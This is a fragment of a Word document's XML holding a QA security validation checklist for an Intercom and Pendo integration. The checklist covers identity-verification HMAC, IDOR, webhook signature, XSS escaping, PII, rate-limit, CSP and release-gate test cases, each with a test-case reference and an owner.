        <w:gridCol w:w="1500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4BC05C90" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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578E5" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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BBDC9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Checklist Item</w:t>
            </w:r>
          </w:p>
        </w:tc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CA4A2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TC Reference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4A1D0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Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="55A0569B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BDC6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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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317F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INTERCOM_IDENTITY_SECRET non-empty in QA env — HMAC generation succeeds</w:t>
            </w:r>
          </w:p>
        </w:tc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B093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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-IV-001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D5C7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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="5C349E87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7664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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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CA1B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Tampered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user_hash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rejected by Intercom (modified 1 byte → 403)</w:t>
            </w:r>
          </w:p>
        </w:tc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3D79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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-IV-002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2E05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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="2A7CC057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27AB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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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B420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Missing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user_hash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when Identity Verification enabled → anonymous session only</w:t>
            </w:r>
          </w:p>
        </w:tc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10E8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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-IV-003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791A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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="39D08C1A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B945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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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57835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Cross-user HMAC hash rejected — usr_qa_001 hash cannot boot as usr_qa_002</w:t>
            </w:r>
          </w:p>
        </w:tc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17D7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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-IV-004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733F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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="0D443B77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B9C5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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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94F6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IDOR blocked: conv_USER_B_55992 returns HTTP 403 when accessed with User A token</w:t>
            </w:r>
          </w:p>
        </w:tc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728A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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-API-002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FAED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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="0834ADFB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9FC4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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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0048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Webhook receiver rejects tampered payload — HTTP 401, no DB update</w:t>
            </w:r>
          </w:p>
        </w:tc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AE65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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-WH-002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2968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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="0A16790F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324D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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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A125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Webhook receiver rejects missing signature — HTTP 401</w:t>
            </w:r>
          </w:p>
        </w:tc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E8E9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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-WH-003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006E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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="0B75E5D9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EE87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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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85FD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XSS: &lt;script&gt; in name attribute not executed — HTML escaped in widget</w:t>
            </w:r>
          </w:p>
        </w:tc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2843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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-XSS-001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61CA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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="3F1225A2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F6BA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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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0E95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SVG onload injection not executed in Intercom widget</w:t>
            </w:r>
          </w:p>
        </w:tc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5618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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-XSS-002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AB86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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="75A14ADB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A913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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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2C5B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INTERCOM_IDENTITY_SECRET absent from all browser network requests</w:t>
            </w:r>
          </w:p>
        </w:tc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9228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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-PII-001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D7AE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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="14154417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1AA7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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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5A19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Pendo initialize() payload contains no email,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subjectId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,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studyName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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63D6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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-PII-004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EA74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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="611F3E0B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1D74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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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CD67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Rate limit: HTTP 429 + Retry-After returned after 83rd request/10s</w:t>
            </w:r>
          </w:p>
        </w:tc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BC5D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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-RL-001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13DD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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="71720183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C286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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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5D8C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CSP header includes *.intercom.io *.pendo.io in script-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src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and connect-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src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc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ACF7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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-CSP-001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6F64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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="6891C588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0FFFE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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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9816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Inline script injection blocked by CSP — violation logged in console</w:t>
            </w:r>
          </w:p>
        </w:tc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6F76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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-CSP-002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D3AB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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B53F0D0" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E4A1F73" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Regression Verified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60"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="7D3E75EB" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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547FC" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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753C9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Checklist Item</w:t>
            </w:r>
          </w:p>
        </w:tc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5F333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TC Reference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FD9AC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Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="498C3E80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EC1C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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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D415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EDC widget boots for qa_user@medrio.com post-patch — HTTP 200 from Intercom, user context shown</w:t>
            </w:r>
          </w:p>
        </w:tc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F9F9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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-REG-001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A0B3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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="6D3BC686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69D5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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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E576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conversation.user.replied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webhook processed correctly with valid HMAC signature</w:t>
            </w:r>
          </w:p>
        </w:tc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C4450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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-REG-002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5A3D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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="11689C63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BE4D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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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6BDC8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Safe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custom_attributes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 (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study_name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,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site_id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 xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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user_role</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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) written and displayed correctly</w:t>
            </w:r>
          </w:p>
        </w:tc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B8BE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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>TC-REG-003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30CA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QA Engineer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="75444D44" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58551899" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220" w:after="80"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Release Gate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60"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1500"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="3E63C166" w14:textId="77777777">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr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D78D4" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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12F49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Checklist Item</w:t>
            </w:r>
          </w:p>
        </w:tc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FEE4C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TC Reference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586DD" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
            <w:pPr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>Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4F6439F1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F3C4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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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90C1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0 Critical severity defects open</w:t>
            </w:r>
          </w:p>
        </w:tc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0EDE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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>All Wave 1-2 TCs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4595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QA Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="74B2000A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FBC93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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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22E1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0 High severity defects open</w:t>
            </w:r>
          </w:p>
        </w:tc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E13C6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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>All Wave 3-4 TCs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9655A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QA Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="38C0727D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8715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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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23F8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All 26 test cases executed — status recorded in JIRA</w:t>
            </w:r>
          </w:p>
        </w:tc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BD4D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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>All TCs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0274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QA Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4AE22102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5041F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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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BE38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QA Security Lead signature obtained</w:t>
            </w:r>
          </w:p>
        </w:tc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41904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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15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0950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QA Security Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="4D4224CF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9200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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5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F296D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Security Team sign-off obtained (InfoSec / AppSec)</w:t>
            </w:r>
          </w:p>
        </w:tc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515DB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E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15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47BE7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Security Team</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w14:paraId="25CFECEE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="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AF582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Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="888888"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>☐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="556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97409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Build #1.0.0.4 cleared for Stage promotion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="18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56831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b/>
                <w:bCs/>
                <w:color w:val="2E75B6"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15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8D6E5"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="C8D6E5"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="C8D6E5"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="C8D6E5"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0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B015C" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="15" w:after="15"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0038631E">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="1A1A2E"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t>QA Lead</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34C13D61" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00AE1C1B">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="745C80AF" w14:textId="77777777" w:rsidR="00AE1C1B" w:rsidRPr="0038631E" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="4" w:color="CCCCCC"/>
        </w:pBdr>
        <w:spacing w:before="200"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038631E">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="888888"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>EDC-42201 · Intercom &amp; Pendo Security Validation · Build 1.0.0.4 · Replaces: Testplan-Rv1.docx (Rovo generic output) · CONFIDENTIAL</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AE1C1B" w:rsidRPr="0038631E"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136E2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFB249BE"/>
    <w:lvl w:ilvl="0" w:tplc="685AD130">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AC0CC856">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3A5A11D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="E9DC4BD0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="BBB0D30C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="00EE16CC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E4D663E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="48740DCC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C64839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0A48D1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="967CA124"/>
    <w:lvl w:ilvl="0" w:tplc="6D1056E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6AF0FF72">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="59741CD4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="436857BC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="47CCE620">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
